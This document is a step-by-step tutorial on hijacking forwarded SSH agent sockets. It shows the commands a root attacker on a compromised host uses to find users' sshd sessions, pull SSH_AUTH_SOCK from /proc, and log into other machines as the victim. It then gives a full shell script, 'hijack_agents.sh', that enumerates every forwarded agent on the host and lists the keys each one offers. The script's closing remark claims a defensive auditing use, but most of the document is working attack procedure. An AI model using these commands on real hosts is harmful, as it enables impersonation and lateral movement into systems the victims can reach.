SSH Hijacking

Step 1: Find the sshd session processes of the users logged into the compromised host. This and every following step assume we already have root on the host: the forwarded agent socket lives in a directory owned by the victim with mode 0700, so no other unprivileged user can reach it.

ps aux | grep sshd

Each interactive session appears as sshd: <user>@pts/N; note the PID of the victim's session.

Step 2: Read SSH_AUTH_SOCK out of the environment of that session. /proc/<PID>/environ is NUL-separated, so grep needs -a, otherwise it only reports "Binary file matches" without showing the value:

grep -a SSH_AUTH_SOCK /proc/<PID>/environ

sshd hands SSH_AUTH_SOCK to the shell it spawns for the user, so if the grep comes back empty, repeat it against the session's child process (the user's shell, found with ps --ppid <PID>). The value has the form /tmp/ssh-XXXXXXX/agent.XXXX and only exists if the victim connected with agent forwarding enabled (ssh -A or ForwardAgent yes).

Step 3: Point our own ssh client at the victim's agent socket and confirm the agent answers. ssh-add -l lists the identities the forwarded agent holds; we never obtain the private keys, the agent simply signs authentication challenges for whoever can open its socket:

SSH_AUTH_SOCK=/tmp/ssh-XXXXXXX/agent.XXXX ssh-add -l

Step 4: Finally, still using the hijacked socket, we log into another system where the victim's key is authorized, authenticating as the victim. This works only while the victim's session on the compromised host stays open, because sshd removes the socket when the session ends:

SSH_AUTH_SOCK=/tmp/ssh-XXXXXXX/agent.XXXX ssh remotesystem -l victim
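The four steps above, collected into one script as an added example (this is not code from the original post). It is meant to be run as root on the compromised host, walks every interactive sshd session to its shell's SSH_AUTH_SOCK, and then asks each agent which keys it will sign with. It assumes Linux /proc, OpenSSH's default /tmp/ssh-XXXXXX/agent.<pid> socket layout, and GNU find, stat and procps; the function names, the "run" argument and the orphan-socket fallback are this example's own choices.

```shell
#!/bin/sh
# Added example, not from the original post. Run as root:
#   ./hijack_agents.sh run
# Lists every forwarded ssh-agent socket on this host and the keys it offers.
# Assumes Linux /proc, OpenSSH's /tmp/ssh-*/agent.* layout, GNU find/stat/procps.

# Extract SSH_AUTH_SOCK from a NUL-separated environment blob, which is the
# format of /proc/<pid>/environ. $1 is the file to read. Prints nothing if the
# file is unreadable or the variable is absent.
auth_sock_from_environ() {
    [ -r "$1" ] || return 0
    tr '\0' '\n' < "$1" | sed -n 's/^SSH_AUTH_SOCK=//p' | head -n 1
}

# Fallback that does not touch /proc at all: enumerate agent sockets under a
# temp directory ($1) purely by their well-known path shape.
find_agent_sockets() {
    find "$1" -mindepth 2 -maxdepth 2 -type s -path "$1/ssh-*/agent.*" 2>/dev/null
}

# Map each interactive sshd session to the agent socket of its shell.
# sshd sets SSH_AUTH_SOCK in the environment it execs the user's shell with,
# so the variable is read from the session's children, not from sshd itself.
# The pattern also matches the "sshd-session: user@pts/N" title used by
# newer OpenSSH releases.
# Output: one "<session pid> <owner> <socket>" line per forwarded agent.
find_forwarded_agents() {
    for sess in $(pgrep -f '^sshd[^:]*: [^ ]*@pts/' 2>/dev/null); do
        owner=$(stat -c %U "/proc/$sess" 2>/dev/null)
        for child in $(pgrep -P "$sess" 2>/dev/null); do
            sock=$(auth_sock_from_environ "/proc/$child/environ")
            [ -n "$sock" ] && printf '%s %s %s\n' "$sess" "$owner" "$sock"
        done
    done | sort -u
}

# Ask the agent behind socket $1 which identities it holds. We never receive
# private key material; the agent signs challenges for anyone who can open
# the socket, which is why root on this host can authenticate as its owner.
list_agent_keys() {
    SSH_AUTH_SOCK="$1" ssh-add -l
}

main() {
    find_forwarded_agents | while read -r sess owner sock; do
        printf '== session %s (%s): %s\n' "$sess" "$owner" "$sock"
        list_agent_keys "$sock"
    done
    # Sockets left behind by sessions we could not map through /proc.
    for sock in $(find_agent_sockets /tmp); do
        printf '== unmatched socket: %s\n' "$sock"
    done
}

# Only act when explicitly asked, so the file can also be sourced for its functions.
if [ "${1:-}" = "run" ]; then
    main
fi
```

Once a socket is chosen, step 4 is simply `SSH_AUTH_SOCK=<socket> ssh <host> -l <owner>`; the script stops at enumeration and key listing so that it can be used for defensive auditing of forwarded agents as well.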